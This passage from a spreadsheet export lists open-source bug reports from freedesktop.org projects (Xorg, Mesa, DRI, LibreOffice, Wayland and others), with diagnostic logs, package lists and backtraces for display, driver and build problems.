RuntimePath=/run/user/1000
DefaultControlGroup=name=systemd:/user/arne
Display=1
State=active
Sessions=1
IdleHint=no
IdleSinceHint=0
IdleSinceHintMonotonic=0
After 'su':
$ loginctl show-session 1
Id=1
Timestamp=So 2012-12-02 21:28:24 CET
TimestampMonotonic=4368073
DefaultControlGroup=name=systemd:/user/arne/1
VTNr=7
Display=:0
Remote=no
Service=kde-np
Leader=298
Audit=1
Type=x11
Class=user
Active=no
State=online
KillProcesses=no
IdleHint=no
IdleSinceHint=0
IdleSinceHintMonotonic=0
Name=arne
$ loginctl show-user 1000
UID=1000
GID=1000
Name=arne
Timestamp=So 2012-12-02 21:28:24 CET
TimestampMonotonic=4360683
RuntimePath=/run/user/1000
DefaultControlGroup=name=systemd:/user/arne
Display=1
State=online
Sessions=1
IdleHint=no
IdleSinceHint=0
IdleSinceHintMonotonic=0</t>
  </si>
  <si>
    <t>arne.staecker</t>
  </si>
  <si>
    <t>LIBREOFFICE-49867</t>
  </si>
  <si>
    <t>TDF Site [PT-BR]: Release notes obsolete</t>
  </si>
  <si>
    <t>A pÃ¡gina http://pt-br.libreoffice.org/baixe-ja-o-libreoffice-em-portugues-do-brasil/notas-da-versao/libreoffice-3-5/ ainda nÃ£o foi atualizada para a versÃ£o 3.5.3. Como nÃ£o tenho conta nÃ£o pude fazer esta atualizaÃ§Ã£o.</t>
  </si>
  <si>
    <t>DRI-36082</t>
  </si>
  <si>
    <t>after moving from dual head to single head during suspend/resume X just shows mouse cursor</t>
  </si>
  <si>
    <t>Debian bug: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=620177
After a suspend/resume cycle quite often X gets stuck: instead of being
shown the GNOME unlock dialog I just get a blank screen with the mouse
cursor in the middle of the screen. Sometimes I cannot move the mouse cursor anymore but not always. Sometimes GNOME's unlock dialog is partially visible as a grey area but without a visible text entry field.
X is not using 100% of CPU time I can still switch to a console and back
Restarting the gdm3 service (thus restarting X) gives me a working X
again. There are no obvious errors in dmesg Xorg.0.log nor
.xsession-errors. Often when this problem happens I moved from dual head to single head configuration while suspend but this may be just coincidence.
In my GNOME session I'm using compiz.
ii  libdrm2                                  2.4.23-3                              Userspace interface to kernel DRM services -- runtime
ii  libdrm-intel1                            2.4.23-3                              Userspace interface to intel-specific kernel DRM services -- runtime
ii  libdrm-nouveau1a                         2.4.23-3                              Userspace interface to nouveau-specific kernel DRM services -- runtime
ii  libdrm-radeon1                           2.4.23-3                              Userspace interface to radeon-specific kernel DRM services -- runtime
ii  libgl1-mesa-dri                          7.10-4                                A free implementation of the OpenGL API -- DRI modules
ii  libgl1-mesa-glx                          7.10-4                                A free implementation of the OpenGL API -- GLX runtime
ii  libglu1-mesa                             7.10-4                                The OpenGL utility library (GLU)
ii  mesa-utils                               8.0.1-2                               Miscellaneous Mesa GL utilities
ii  x11-xserver-utils                        7.6+1                                 X server utilities
ii  xserver-common                           2:1.9.5-1                             common files used by various X servers
ii  xserver-xephyr                           2:1.7.7-13                            nested X server
ii  xserver-xorg                             1:7.5+8                               the X.Org X server
ii  xserver-xorg-core                        2:1.9.5-1                             Xorg X server - core server
ii  xserver-xorg-core-dbg                    2:1.9.5-1                             Xorg - the X.Org X server (debugging symbols)
ii  xserver-xorg-input-all                   1:7.6+6                               the X.Org X server -- input driver metapackage
ii  xserver-xorg-input-evdev                 1:2.6.0-2                             X.Org X server -- evdev input driver
ii  xserver-xorg-input-synaptics             1.4.0-1                               Synaptics TouchPad driver for X.Org server
ii  xserver-xorg-input-wacom                 0.10.10+20110203-1                    X.Org X server -- Wacom input driver
ii  xserver-xorg-video-all                   1:7.6+6                               the X.Org X server -- output driver metapackage
ii  xserver-xorg-video-apm                   1:1.2.3-2                             X.Org X server -- APM display driver
ii  xserver-xorg-video-ark                   1:0.7.3-2                             X.Org X server -- ark display driver
ii  xserver-xorg-video-ati                   1:6.14.0-1                            X.Org X server -- AMD/ATI display driver wrapper
ii  xserver-xorg-video-chips                 1:1.2.4-1                             X.Org X server -- Chips display driver
ii  xserver-xorg-video-cirrus                1:1.3.2-4                             X.Org X server -- Cirrus display driver
ii  xserver-xorg-video-fbdev                 1:0.4.2-4                             X.Org X server -- fbdev display driver
ii  xserver-xorg-video-i128                  1:1.3.4-2                             X.Org X server -- i128 display driver
ii  xserver-xorg-video-intel                 2:2.14.0-4                            X.Org X server -- Intel i8xx i9xx display driver
ii  xserver-xorg-video-mach64                6.8.2-5                               X.Org X server -- ATI Mach64 display driver
ii  xserver-xorg-video-mga                   1:1.4.13.dfsg-3                       X.Org X server -- MGA display driver
ii  xserver-xorg-video-neomagic              1:1.2.5-2                             X.Org X server -- Neomagic display driver
ii  xserver-xorg-video-nouveau               1:0.0.16+git20101210+8bb8231-2        X.Org X server -- Nouveau display driver (experimental)
ii  xserver-xorg-video-openchrome            1:0.2.904+svn918-1                    X.Org X server -- VIA display driver
ii  xserver-xorg-video-r128                  6.8.1-5                               X.Org X server -- ATI r128 display driver
ii  xserver-xorg-video-radeon                1:6.14.0-1                            X.Org X server -- AMD/ATI Radeon display driver
ii  xserver-xorg-video-rendition             1:4.2.4-2                             X.Org X server -- Rendition display driver
ii  xserver-xorg-video-s3                    1:0.6.3-4                             X.Org X server -- legacy S3 display driver
ii  xserver-xorg-video-s3virge               1:1.10.4-4                            X.Org X server -- S3 ViRGE display driver
ii  xserver-xorg-video-savage                1:2.3.2-3                             X.Org X server -- Savage display driver
ii  xserver-xorg-video-siliconmotion         1:1.7.5-1                             X.Org X server -- SiliconMotion display driver
ii  xserver-xorg-video-sis                   1:0.10.3-3                            X.Org X server -- SiS display driver
ii  xserver-xorg-video-sisusb                1:0.9.4-2                             X.Org X server -- SiS USB display driver
ii  xserver-xorg-video-tdfx                  1:1.4.3-4                             X.Org X server -- tdfx display driver
ii  xserver-xorg-video-trident               1:1.3.4-2                             X.Org X server -- Trident display driver
ii  xserver-xorg-video-tseng                 1:1.2.4-2                             X.Org X server -- Tseng display driver
ii  xserver-xorg-video-vesa                  1:2.3.0-5                             X.Org X server -- VESA display driver
ii  xserver-xorg-video-vmware                1:11.0.3-2                            X.Org X server -- VMware display driver
ii  xserver-xorg-video-voodoo                1:1.2.4-2                             X.Org X server -- Voodoo display driver
Debian kernel 2.6.38-2-amd64 version 2.6.38-2.
Xorg log and X and gnome-screensaver strace and gdb backtraces can be found in the debian bug report.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-25996</t>
  </si>
  <si>
    <t>Repaired some keymap/xfree86 mappings to symbols</t>
  </si>
  <si>
    <t>Created attachment 32579
Patch to repair some keymap/xfree86 mappings to the symbol files
I tried to use xkbcomp on keymap/xfree86 and got errors because it is referring to symbol files that no longer exist. I updated the mappings based on my best guess on how the symbol files got consolidated. All updated mappings were tested with 'xkbcomp xfree86 -m xxx' to confirm existance but not correctness.
I also added a little note to the README file. It took me a long long time to figure out how to get xkbprint (and xkbcomp) to work. 
I'd like to update xkbcomp.man with an example using the present file organization but it would be a first time man page mod for me and I'm not sure what the conventions around this are.</t>
  </si>
  <si>
    <t>hauptmech</t>
  </si>
  <si>
    <t>XORG-4566</t>
  </si>
  <si>
    <t>imake in modular tree</t>
  </si>
  <si>
    <t>imake and xmkmf are not yet modularized. 
Some apps (kdm xaw3d) require them. What's planned for the future? Should 
imake be modularized as well or should upstream bugs be filled to replace 
imake-build-systems?</t>
  </si>
  <si>
    <t>DRI-87951</t>
  </si>
  <si>
    <t>[gen4] Hot plugged VGA output doesn't work</t>
  </si>
  <si>
    <t>I have Toshiba Portege R600-10Q laptop (a model from 2009) which has an Intel GS45 graphics chipset. It ran Windows Vista when bought and the VGA output worked as expected. 
I recently installed Ubuntu 14.04 64-bit on the laptop. When I have a VGA cable plugged in at boot up the VGA output works fine. If instead I plug a VGA cable in after boot up the external monitor is recognized but receives no signal.This happens with several different monitors.
More details can be found here:
https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1364292</t>
  </si>
  <si>
    <t>o.j.woodford.98</t>
  </si>
  <si>
    <t>LIBREOFFICE-38056</t>
  </si>
  <si>
    <t>ODF import: Page Borders handling broken</t>
  </si>
  <si>
    <t>Created attachment 47699
A ODT Document with Page Borders
An ODT file is created with page borders using LibreOffce 3.3.2 however the page borders are gone when the document is opened by LibreOffice 3.4.0. This should be a bug.</t>
  </si>
  <si>
    <t>shreks2099</t>
  </si>
  <si>
    <t>TELEPATHY-67828</t>
  </si>
  <si>
    <t>roster/groups.py test fails with modern telepathy-glib</t>
  </si>
  <si>
    <t>Created attachment 83723
roster/groups: don't rely on an implementation detail
Before telepathy-glib 0.20.3 and 0.21.1 we had this incorrect sequence
(pseudocode) for each group:
* NewChannels(the group)
* GroupsChanged([the group] added: [...] removed: [])
* NewChannels(the group)
In 0.20.3 and 0.20.1 we removed the second emission of NewChannels
(Bug #52011). Unfortunately that broke this test which was specifically
expecting GroupsChanged followed by NewChannels.
Rather than reversing the assumption I'm doing it properly by
expecting the events in no particular order.</t>
  </si>
  <si>
    <t>DRI-98228</t>
  </si>
  <si>
    <t>[BAT IVB] HDMI *ERROR* EDID checksum is invalid</t>
  </si>
  <si>
    <t>The following error occurs on IVB after various IGT KMS tests during HDMI detection:
[drm:drm_edid_block_valid] *ERROR* EDID checksum is invalid remainder is 144
with varying remainder.
Just before this problem appeared in CI DRM 1701 build a new HDMI monitor was connected to the machine (Acer G6 Series G246HYL).</t>
  </si>
  <si>
    <t>DBUS-75862</t>
  </si>
  <si>
    <t>W32: test_default_session_servicedirs may use wrong directories due to its use of DBUS_DATADIR</t>
  </si>
  <si>
    <t>The function that returns servicedirs knows how to strip the prefix from
configure-time DBUS_DATADIR. That functionality is not exposed (function is
static) so we'll have to use what we have.
Without this DBUS_DATADIR will be used verbatim as configured and it
configures to something like /mingw/share/dbus which is not what you need
in this context.</t>
  </si>
  <si>
    <t>lrn1986</t>
  </si>
  <si>
    <t>XORG-13808</t>
  </si>
  <si>
    <t>mouse sensitivity setting (for acceleration disabled)</t>
  </si>
  <si>
    <t>Older versions of the X server would (implicitly) allow one to do for example
xset m 1/8 1
to disable mouse acceleration. The '1/8' could be tweaked to change the
mouse sensitivity under these non-accelerated conditions.
In the latest versions of the X server the code has been (significantly?)
cleaned up. Unfortunately the above no longer works properly. Try it the mouse
pointer will not move unless the mouse is moved very rapidly.
It would be nice if there was a (driver-independent?) way to set the mouse
sensitivity.
The old way was consistent in the sense that
(1) xset m 2 1
doubles the mouse speed but still disables acceleration and that
(2) xset m 1/8 1
decreases the mouse speed by some amount.
I have no idea how to re-implement the old model. The current code appears to
be correct it multiplies the mouse delta by 1/8 and for small movements the
mouse delta can be (1 1) (1/8)*(1 1) = (0 0) and so this results in no
pointer motion.
Can this be fixed so that even without acceleration one can use fractional
values like '1/8' to modify the mouse sensitivity?</t>
  </si>
  <si>
    <t>syscrash2k</t>
  </si>
  <si>
    <t>POPPLER-4332</t>
  </si>
  <si>
    <t>use CPU while loading some PDFs (type 3 fonts)</t>
  </si>
  <si>
    <t>This bug is based on http://bugzilla.ubuntu.com/show_bug.cgi?id=14348
Up to date Breezy evince refuses to load a particular PDF (attached not very
big). It will thumbnail the first 2 or 3 pages maybe even display them (depends
on the mood it seems) but all other thumbnails will stay blank as will the
corresponding pages if click on them in a hope the it would evince up...
Tried with Acrobat Reader no problems at all.
...
http://bugzilla.ubuntu.com/attachment.cgi?id=3451
won't load this document</t>
  </si>
  <si>
    <t>WAYLAND-63360</t>
  </si>
  <si>
    <t>wayland: fail to build on centos 5.5 without signalfd support</t>
  </si>
  <si>
    <t>-bash-3.2$ lsb_release -ri
Distributor ID:	CentOS
Release:	5.5
-bash-3.2$ uname -r
2.6.18-194.el5PAE
-bash-3.2$ /lib/libc.so.6 
GNU C Library stable release version 2.5 by Roland McGrath et al.
Log:
| wayland-1.0.6/src/wayland-shm.c: In function 'shm_pool_create_buffer':
| wayland-1.0.6/src/wayland-shm.c:134: warning: dereferencing type-punned pointer will break strict-aliasing rules
| wayland-1.0.6/src/wayland-server.c: In function 'get_socket_lock':
| wayland-1.0.6/src/wayland-server.c:1245: error: 'O_CLOEXEC' undeclared (first use in this function)
| wayland-1.0.6/src/wayland-server.c:1245: error: (Each undeclared identifier is reported only oncewayland-1.0.6/src/event-loop.c:33:26: error: sys/signalfd.h: No such file or directory
| wayland-1.0.6/src/event-loop.c:34:25: error: sys/timerfd.h: No such file or directory
| wayland-1.0.6/src/wayland-shm.c: In function 'shm_create_pool':
| wayland-1.0.6/src/wayland-shm.c:217: warning: dereferencing type-punned pointer will break strict-aliasing rules
| 
| wayland-1.0.6/src/wayland-server.c:1245: error: for each function it appears in.)
| wayland-1.0.6/src/wayland-shm.c: In function 'wl_shm_buffer_create':
| wayland-1.0.6/src/wayland-shm.c:289: warning: dereferencing type-punned pointer will break strict-aliasing rules
| wayland-1.0.6/src/wayland-shm.c: In function 'wl_buffer_is_shm':
| wayland-1.0.6/src/wayland-shm.c:304: warning: dereferencing type-punned pointer will break strict-aliasing rules
| wayland-1.0.6/src/data-device.c: In function 'wl_data_source_send_offer':
| wayland-1.0.6/src/data-device.c:105: warning: dereferencing type-punned pointer will break strict-aliasing rules
| wayland-1.0.6/src/data-device.c: In function 'create_data_source':
| wayland-1.0.6/src/data-device.c:466: warning: dereferencing type-punned pointer will break strict-aliasing rules
| make[3]: *** [wayland-server.lo] Error 1
| make[3]: *** Waiting for unfinished jobs....
| wayland-1.0.6/src/wayland-client.c: In function 'wl_display_connect_to_fd':
| wayland-1.0.6/src/wayland-client.c:529: warning: dereferencing type-punned pointer will break strict-aliasing rules
| wayland-1.0.6/src/event-loop.c: In function 'wl_event_loop_add_timer':
| wayland-1.0.6/src/event-loop.c:199: warning: implicit declaration of function 'timerfd_create'
| wayland-1.0.6/src/event-loop.c:199: error: 'CLOCK_MONOTONIC' undeclared (first use in this function)
| wayland-1.0.6/src/event-loop.c:199: error: (Each undeclared identifier is reported only once
| wayland-1.0.6/src/event-loop.c:199: error: for each function it appears in.)
| wayland-1.0.6/src/event-loop.c:199: error: 'TFD_CLOEXEC' undeclared (first use in this function)
| wayland-1.0.6/src/event-loop.c: In function 'wl_event_source_timer_update':
| wayland-1.0.6/src/event-loop.c:208: error: storage size of 'its' isn't known
| wayland-1.0.6/src/event-loop.c:214: warning: implicit declaration of function 'timerfd_settime'
| wayland-1.0.6/src/event-loop.c:208: warning: unused variable 'its'
| wayland-1.0.6/src/event-loop.c: In function 'wl_event_source_signal_dispatch':
| wayland-1.0.6/src/event-loop.c:234: error: storage size of 'signal_info' isn't known
| wayland-1.0.6/src/event-loop.c:234: warning: unused variable 'signal_info'
| wayland-1.0.6/src/event-loop.c: In function 'wl_event_loop_add_signal':
| wayland-1.0.6/src/event-loop.c:268: warning: implicit declaration of function 'signalfd'
| wayland-1.0.6/src/event-loop.c:268: error: 'SFD_CLOEXEC' undeclared (first use in this function)
| make[3]: *** [event-loop.lo] Error 1</t>
  </si>
  <si>
    <t>chnarius</t>
  </si>
  <si>
    <t>XORG-73981</t>
  </si>
  <si>
    <t>Intel segfault at Xorg startup with latest bits (regression).</t>
  </si>
  <si>
    <t>Created attachment 92680
Xorg.0.log
With the latest git xf86-video-intel I am getting a segfault immediately upon
starting the X server.  The last known working version of the driver was
1.15.0 which unfortunately not longer builds against the latest X server.
Here's the backtrace from GDB...
  Program terminated with signal 11 Segmentation fault.
  #0  0x00007ffbb6f8e187 in sna_probe_initial_configuration (sna=0x7ffbbb936000)
      at sna_display.c:3495
  3495				if (to_sna_crtc(crtc)-&gt;id != crtc_id)
  (gdb) bt
  #0  0x00007ffbb6f8e187 in sna_probe_initial_configuration (sna=0x7ffbbb936000)
      at sna_display.c:3495
  #1  0x00007ffbb6f8e743 in sna_mode_pre_init (scrn=0x1a2cbe0 
      sna=0x7ffbbb936000) at sna_display.c:3638
  #2  0x00007ffbb6f934d3 in sna_pre_init (scrn=0x1a2cbe0 flags=0)
      at sna_driver.c:611
  #3  0x000000000047e392 in InitOutput (
      pScreenInfo=pScreenInfo@entry=0x822200  argc=argc@entry=1 
      argv=argv@entry=0x7fff40f69418)
      at /usr/src/debug/x11-base/xorg-server-1.15.0/xorg-server-1.15.0/hw/xfree86/common/xf86Init.c:594
  #4  0x000000000043f906 in dix_main (argc=1 argv=0x7fff40f69418 
      envp=)
      at /usr/src/debug/x11-base/xorg-server-1.15.0/xorg-server-1.15.0/dix/main.c:200
  #5  0x00007ffbb9a46bf5 in __libc_start_main (main=0x42a520  argc=1 
      ubp_av=0x7fff40f69418 init= fini= 
      rtld_fini= stack_end=0x7fff40f69408) at libc-start.c:258
  #6  0x000000000042a551 in _start ()
Obligatory version information...
  Intel G45 chip
  Linux 3.12.5
  xf86-video-intel (git but most of the 2.99.xxx versions I tried failed too)
  X server 1.15.0
  libdrm 2.4.51
I will attempt to bisect if I have time</t>
  </si>
  <si>
    <t>DRI-110764</t>
  </si>
  <si>
    <t>[CI][SHARDS] igt@prime_vgem@(busy|fence-wait|wait|sync)-bsd1 - fail - Failed assertion: ptr[i] == i</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_6133/shard-snb5/igt@prime_vgem@wait-bsd1.html
Starting subtest: wait-bsd1
(prime_vgem:1938) CRITICAL: Test assertion failure function test_wait file ../tests/prime_vgem.c:473:
(prime_vgem:1938) CRITICAL: Failed assertion: ptr[i] == i
(prime_vgem:1938) CRITICAL: error: 0 != 0x1</t>
  </si>
  <si>
    <t>XORG-16475</t>
  </si>
  <si>
    <t>CharSet-to-CompoundText Conversion Failed for Thai Locales</t>
  </si>
  <si>
    <t>This is yet another fix for SCIM on Thai locales after bug 15719.
With bug 15719 fixed SCIM now loads on Thai locale. But it commits nothing for Thai input.
Steps to reproduce:
1. Install a Thai-capable SCIM module e.g. scim-tables or scim-thai
2. scim -d
3. LC_ALL=th_TH.UTF-8 XMODIFIERS=@im=SCIM xterm
4. Switch to Thai IM and type some characters
Expected result:
- Thai characters appear
What actually happens:
- Nothing appear
This is because SCIM commits string in compound text form converted via XwcTextListToTextProperty(). But the XLC_LOCALE for th_TH and th_TH.UTF-8 declares cs1's ct_encoding as TIS620-0:GR which is commented out in src/xlibi18n/lcCT.c default_ct_data in favor of ISO8859-11 ESC sequence.
Declaring this as ISO8859-11:GR instead just makes it work.</t>
  </si>
  <si>
    <t>MESA-29675</t>
  </si>
  <si>
    <t>Variable indexing of variable arrays in the FS unsupported</t>
  </si>
  <si>
    <t>Created attachment 37980
shader from RenderFeatTest32
Hi
Shaders fail to work in a couple of applications: Variable indexing of variable arrays in the FS unsupported
Among them are the game Coldest:
http://www.coldestgame.com/site/
And the render test for the upcoming game Amnesia:
http://frictionalgames.com/forum/thread-3604-page-1.html
Not sure if this is a problem with glsl2 or a limitation in i965.
I'm using git master c54dea66fd86f6000e334c703ea4890179c39c81
One of the failing shaders from RenderFeatTest32 is attached.</t>
  </si>
  <si>
    <t>TELEPATHY-69272</t>
  </si>
  <si>
    <t>Fix Haze deprecations</t>
  </si>
  <si>
    <t>DRI-93029</t>
  </si>
  <si>
    <t>Hangcheck timer too agressive to pass dEQP for SNBGT1</t>
  </si>
  <si>
    <t>Mesa began running Google's dEQP validation suite on older platforms and found that spurious/random GPU hangs occured on SNB especially SNBGT1.
Turning off gpu reset did not prevent GPU HANGS as reported in dmesg.  In spite of the detected hangs the test suite completed without error.  If the GPU were *really* hung we would be able to see which dEQP test was stuck.  However the test suite completed without incident.
Disabling hang check on SNB systems has eliminated these spurious dEQP failures entirely.
Google's suite includes some tests which are intended to generate GPU Hangs (we skip those) and others which have long-running shaders that may not appear to make progress.
Based on this behavior it seems reasonable to tailor the hangcheck timer to the platform.
Passing dEQP is important because Google uses the suite to validate platforms for ChromeOS.  Sandy bridge is an important ChromeOS platform.  We don't want a stabel Mesa release to be blocked from release because of spurious GPU Hangs on SNB.</t>
  </si>
  <si>
    <t>MESA-44701</t>
  </si>
  <si>
    <t>Regnum online textures flickering</t>
  </si>
  <si>
    <t>Created attachment 55469
some screenshots that show the issue
Hi all
I have installed regnum online in my two computers with a Radeon x1650pro (AGP)
and the other one has a HD 4670 PciX Both are using this driver
OpenGL version string: 2.1 Mesa 8.0-devel (git-3235435 oneiric-oibaf-ppa)
OpenGL shading language version string: 1.20
but is the same with all versions of mesa 7.12 and 7.11
the game only can be playable with safe mode. if fixed or shader 2 mode are selected some textures flickering like the screenshots show.
if safe mode is enabled the only error message is:
Mesa: User error: GL_INVALID_OPERATION in glBindTexture(target mismatch)
but everything is ok inside the game
by deactivating safe mode:
Mesa: User error: GL_INVALID_OPERATION in glCompressedTexImage2D(invalid width or height for compression format)
Mesa: User error: GL_INVALID_OPERATION in glTexParameter(param=-1)
Mesa warning: glDraw[Range]Elements(start 5358 end 5754 count 396 type 0x1403 indices=0x29dc)
	end is out of bounds (max=2943)  Element Buffer 384 (size 11508)
	This should probably be fixed in the application.
Mesa warning: glDraw[Range]Elements(start 3558 end 5358 count 1800 type 0x1403 indices=0x1bcc)
	end is out of bounds (max=2943)  Element Buffer 384 (size 11508)
	This should probably be fixed in the application.
Mesa warning: glDraw[Range]Elements(start 14592 end 16122 count 1530 type 0x1403 indices=0x7200)
any further question just let me know
thanks in advance</t>
  </si>
  <si>
    <t>silpablo</t>
  </si>
  <si>
    <t>DRI-94005</t>
  </si>
  <si>
    <t>[KBL] igt/gem_ctx_thrash subtests are crash</t>
  </si>
  <si>
    <t>Created attachment 121525
dmesg log
Setup:
------
Hardware
Platform: KABY LAKE-U 
CPU : Intel(R) Core(TM) @ 2.60GHz
MCP : KBL-U G0 2+2 (ou ULT-G0)
QDF : QYQ8
Chipset PCH: SPT-LP C1 
CRB : KABY LAKE U DDR3L RVP7 CRB FAB1
Software
BIOS : KBLSE2R1.R00.X015.B01.1511271314
ME FW : 11.5.0.1008
Ksc (EC FW): 1.20
Linux distribution: Ubuntu 15.10 64 bits
Kernel: drm-intel-nightly 4.5.0-rc1 5d3deb0 from http://cgit.freedesktop.org/drm-intel/
commit 5d3deb0902a962218ad9b0e583e4d1bbdec29f9a
Author: Rodrigo Vivi 
Date:   Mon Feb 1 12:05:18 2016 -0800
    drm-intel-nightly: 2016y-02m-01d-20h-05m-03s UTC integration manifest
drm: tag libdrm-2.4.66 e342c0f
intel-gpu-tool: intel-gpu-tools-1.13-179-g3005665
Steps:
------
run the command :
#  ./gem_ctx_thrash
Actual result:
---------------
The subtests crash.
Expected result:
----------------
The results are pass or skip.</t>
  </si>
  <si>
    <t>XORG-7043</t>
  </si>
  <si>
    <t>With XGL on r300 mouse cursor disappears when switching VTs</t>
  </si>
  <si>
    <t>When I switch to another vt (console or server) and then back to xgl server the
mouse pointer is no longer visible - though still works. There is also a
rectangular corruption around where the pointer was last time before the vt
switching. Using SWcursor in the radeon driver 'solves' this - but has major
flickering of the pointer.</t>
  </si>
  <si>
    <t>gad.kadosh</t>
  </si>
  <si>
    <t>XORG-12490</t>
  </si>
  <si>
    <t>ati radeon r100 driver fails to load on freebsd 6.2 stable</t>
  </si>
  <si>
    <t>os is freebsd 6.2 stable - xorg 7.3 built from ports source using portupgrade -R xorg.
compiler switches -O2 march=athlon-tbird -pipe
xorg was built without incident.
startx after build fails.
xorg log file follows:
_XSERVTransSocketOpenCOTSServer: Unable to open socket for inet6
_XSERVTransOpen: transport open failed for inet6/venice.gwirynybyd.com:0
_XSERVTransMakeAllCOTSServerListeners: failed to open listener for inet6
X.Org X Server 1.4.0
Release Date: 5 September 2007
X Protocol Version 11 Revision 0
Build Operating System: FreeBSD 6.2-STABLE i386 
Current Operating System: FreeBSD venice.gwirynybyd.com 6.2-STABLE FreeBSD 6.2-STABLE #0: Sun May 13 16:34:21 PDT 2007     colby@venice.gwirynybyd.com:/usr/obj/usr/src/sys/VENICE-1 i386
Build Date: 18 September 2007  03:08:41PM
	Before reporting problems check http://wiki.x.org
	to make sure that you have the latest version.
Module Loader present
Markers: (--) probed (**) from config file (==) default setting
	(++) from command line (!!) notice (II) informational
	(WW) warning (EE) error (NI) not implemented (??) unknown.
(==) Log file: /var/log/Xorg.0.log Time: Wed Sep 19 09:29:49 2007
(==) Using config file: /etc/X11/xorg.conf
(==) ServerLayout Simple Layout
(**) |--&gt;Screen Screen 1 (0)
(**) |   |--&gt;Monitor My Monitor
(**) |   |--&gt;Device ** ATI Radeon (generic)               [radeon]
(**) |--&gt;Input Device Mouse1
(**) |--&gt;Input Device Keyboard1
(==) Automatically adding devices
(==) Automatically enabling devices
(WW) `fonts.dir' not found (or not valid) in /usr/local/lib/X11/fonts/local/.
	Entry deleted from font path.
	(Run 'mkfontdir' on /usr/local/lib/X11/fonts/local/).
(==) Including the default font path /usr/local/lib/X11/fonts/misc//usr/local/lib/X11/fonts/TTF//usr/local/lib/X11/fonts/OTF/usr/local/lib/X11/fonts/Type1//usr/local/lib/X11/fonts/100dpi//usr/local/lib/X11/fonts/75dpi/.
(**) FontPath set to:
	/usr/local/lib/X11/fonts/misc/
	/usr/local/lib/X11/fonts/TTF/
	/usr/local/lib/X11/fonts/OTF
	/usr/local/lib/X11/fonts/Type1/
	/usr/local/lib/X11/fonts/100dpi/
	/usr/local/lib/X11/fonts/75dpi/
	/usr/local/lib/X11/fonts/dejavu
	/usr/local/lib/X11/fonts/webfonts
	/usr/local/lib/X11/fonts/bitstream-vera
	/usr/local/lib/X11/fonts/misc/
	/usr/local/lib/X11/fonts/TTF/
	/usr/local/lib/X11/fonts/OTF
	/usr/local/lib/X11/fonts/Type1/
	/usr/local/lib/X11/fonts/100dpi/
	/usr/local/lib/X11/fonts/75dpi/
(==) RgbPath set to /usr/local/share/X11/rgb
(==) ModulePath set to /usr/local/lib/xorg/modules
(II) Loader magic: 0x81ccb00
(II) Module ABI versions:
	X.Org ANSI C Emulation: 0.3
	X.Org Video Driver: 2.0
	X.Org XInput driver : 2.0
	X.Org Server Extension : 0.3
	X.Org Font Renderer : 0.5
(II) Loader running on freebsd
(II) LoadModule: pcidata
(II) Loading /usr/local/lib/xorg/modules//libpcidata.so
(II) Module pcidata: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.0.0
	ABI class: X.Org Video Driver version 2.0
(--) Using syscons driver with X support (version 2.0)
(--) using VT number 9
(II) PCI: Probing config type using method 1
(II) PCI: Config type is 1
(II) PCI: stages = 0x03 oldVal1 = 0x00000000 mode1Res1 = 0x80000000
(WW) OS did not count PCI devices guessing wildly
(II) PCI: PCI scan (all values are in hex)
(II) PCI: 00:00:0: chip 11060305 card 00000000 rev 03 class 060000 hdr 00
(II) PCI: 00:01:0: chip 11068305 card 00000000 rev 00 class 060400 hdr 01
(II) PCI: 00:07:0: chip 11060686 card 11060000 rev 40 class 060100 hdr 80
(II) PCI: 00:07:1: chip 11060571 card 11060571 rev 06 class 01018a hdr 00
(II) PCI: 00:07:2: chip 11063038 card 09251234 rev 16 class 0c0300 hdr 00
(II) PCI: 00:07:3: chip 11063038 card 09251234 rev 16 class 0c0300 hdr 00
(II) PCI: 00:07:4: chip 11063057 card 11063057 rev 40 class 068000 hdr 00
(II) PCI: 00:0b:0: chip 10b79200 card 10b71000 rev 74 class 020000 hdr 00
(II) PCI: 00:0f:0: chip 13f60111 card 13f60111 rev 10 class 040100 hdr 00
(II) PCI: 01:00:0: chip 10025144 card 1002008a rev 00 class 030000 hdr 00
(II) PCI: End of PCI scan
(II) Host-to-PCI bridge:
(II) Bus 0: bridge is at (0:0:0) (001) BCTRL: 0x0008 (VGA_EN is set)
(II) Bus 0 I/O range:
	[0] -1	0	0x00000000 - 0x0000ffff (0x10000) IX[B]
(II) Bus 0 non-prefetchable memory range:
	[0] -1	0	0x00000000 - 0xffffffff (0x0) MX[B]
(II) Bus 0 prefetchable memory range:
	[0] -1	0	0x00000000 - 0xffffffff (0x0) MX[B]
(II) PCI-to-PCI bridge:
(II) Bus 1: bridge is at (0:1:0) (011) BCTRL: 0x000c (VGA_EN is set)
(II) Bus 1 I/O range:
	[0] -1	0	0x0000c000 - 0x0000c0ff (0x100) IX[B]
	[1] -1	0	0x0000c400 - 0x0000c4ff (0x100) IX[B]
	[2] -1	0	0x0000c800 - 0x0000c8ff (0x100) IX[B]
	[3] -1	0	0x0000cc00 - 0x0000ccff (0x100) IX[B]
(II) Bus 1 non-prefetchable memory range:
	[0] -1	0	0xdc000000 - 0xddffffff (0x2000000) MX[B]
(II) Bus 1 prefetchable memory range:
	[0] -1	0	0xd0000000 - 0xd7ffffff (0x8000000) MX[B]
(II) PCI-to-ISA bridge:
(II) Bus -1: bridge is at (0:7:0) (0-1-1) BCTRL: 0x0008 (VGA_EN is set)
(--) PCI:*(1:0:0) ATI Technologies Inc Radeon R100 QD [Radeon 7200] rev 0 Mem @ 0xd0000000/27 0xdd000000/19 I/O @ 0xc000/8
(II) Addressable bus resource ranges are
	[0] -1	0	0x00000000 - 0xffffffff (0x0) MX[B]
	[1] -1	0	0x00000000 - 0x0000ffff (0x10000) IX[B]
(II) OS-reported resource ranges:
	[0] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[1] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[2] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[3] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[4] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[5] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
(II) PCI Memory resource overlap reduced 0xd8000000 from 0xdfffffff to 0xd7ffffff
(II) Active PCI resource ranges:
	[0] -1	0	0xdf000000 - 0xdfffffff (0x1000000) MX[B]E
	[1] -1	0	0xd8000000 - 0xd7ffffff (0x0) MX[B]EO
